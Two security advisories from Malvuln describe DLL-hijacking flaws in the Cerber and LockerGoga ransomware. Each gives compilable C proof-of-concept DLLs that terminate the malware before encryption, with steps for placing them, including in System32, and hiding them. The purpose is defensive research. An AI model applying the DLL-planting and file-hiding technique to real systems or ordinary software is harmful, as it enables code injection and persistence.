<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/ae99e6a451bc53830be799379f5c1104.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.Cerber<br />Vulnerability: Code Execution<br />Description: Cerber looks for and executes DLLs in its current directory. Therefore, we can hijack a vuln DLL, execute our own code, control and terminate the malware pre-encryption. The exploit dll checks if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. We do not need to rely on hash signatures or third-party products, the malwares flaw does the work for us. Endpoint protection systems and or antivirus can potentially be killed prior to executing malware, but this method cannot as there's nothing to kill the DLL just lives on disk waiting. From a defensive perspective you can add the DLLs to a specific network share containing important data as a layered approach. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Cerber<br />Type: PE32<br />MD5: ae99e6a451bc53830be799379f5c1104<br />Vuln ID: MVID-2022-0585<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=1FVDZcrgN1U<br /><br />Exploit/PoC:<br />1) Compile the following C code as "CLDAPI.dll" 32bit<br />2) Place the DLL in same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "CLDAPI.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/5/2022<br />//Purpose: <br />//gcc -c CLDAPI.c -m32<br />//gcc -shared -o CLDAPI.dll CLDAPI.o -m32<br /><br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> if(GetCurrentDirectory(MAX_PATH, buf))<br /> if(strcmp("C:\\Windows\\System32", buf) != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).</code></pre>
<pre><code>Discovery / credits: Malvuln - (John Page - aka hyp3rlinx) (c) 2022<br />Original source:<br />https://malvuln.com/advisory/3b200c8173a92c94441cb062d38012f6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan-Ransom.LockerGoga<br />Vulnerability: Code Execution<br />Description: LockerGoga looks for and loads a DLL named "wow64log.dll" in<br />Windows\System32. Therefore, we can drop our own DLL to intercept and<br />terminate the malware pre-encryption. Four processes are created E.g.<br />"imtvknqq9737.exe" running under AppData\Local\Temp, the process name is<br />"imtvknqq" plus a appended random number. Our exploit dll will simply<br />display a Win32API message box and call exit(). The exploit DLL must export<br />"InterlockedExchange" function or it fails with error. We do not need to<br />rely on hash signature or third-party product, the malwares own flaw will<br />do the work for us. Endpoint protection systems and or antivirus can<br />potentially be killed prior to executing malware, but this method cannot as<br />theres nothing to kill the DLL just lives on disk waiting. From defensive<br />perspective you can add the DLLs to a specific network share containing<br />important data as a layered approach. All basic tests were conducted<br />successfully in a virtual machine environment.<br />Family: LockerGoga<br />Type: PE32<br />MD5: 3b200c8173a92c94441cb062d38012f6<br />Vuln ID: MVID-2022-0587<br />Disclosure: 05/05/2022<br />Video PoC URL: https://www.youtube.com/watch?v=1_7vmbHmCQQ<br /><br />Exploit/PoC:<br />1) Compile the following C code as "wow64log.dll" as x64<br />2) Place the DLL in Windows/System32<br />3) Run the malware then BOOM!<br /><br />#include "windows.h"<br /><br />//By malvuln - 5/2022<br />//Target: Trojan-Ransom.LockerGoga<br />//MD5: 3b200c8173a92c94441cb062d38012f6<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software<br />or improper malware<br />handling. By using this code you assume and accept all risk implied or<br />otherwise.<br />**/<br /><br />//compile as x64<br />//gcc -c wow64log.c<br />//gcc -shared -o wow64log.dll wow64log.o<br />//DLL must live under Windows/System32 dir<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Code Exec", "by malvuln", MB_OK);<br /> exit(0);<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br />extern __declspec(dllexport) WINBASEAPI LONG WINAPI InterlockedExchange<br />(LONG volatile *Target, LONG Value){<br /> exit(1);<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied<br />"as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory,<br />provided that it is not altered except by reformatting it, and that due<br />credit is given. Permission is explicitly given for insertion in<br />vulnerability databases and similar, provided that due credit is given to<br />the author. The author is not responsible for any misuse of the information<br />contained herein and accepts no responsibility for any damage caused by the<br />use or misuse of this information. The author prohibits any malicious use<br />of security related information or exploits by the author or elsewhere. Do<br />not attempt to download Malware samples. The author of this website takes<br />no responsibility for any kind of damages occurring from improper Malware<br />handling or the downloading of ANY Malware mentioned on this website or<br />elsewhere. All content Copyright (c) Malvuln.com (TM).<br /><br /></code></pre>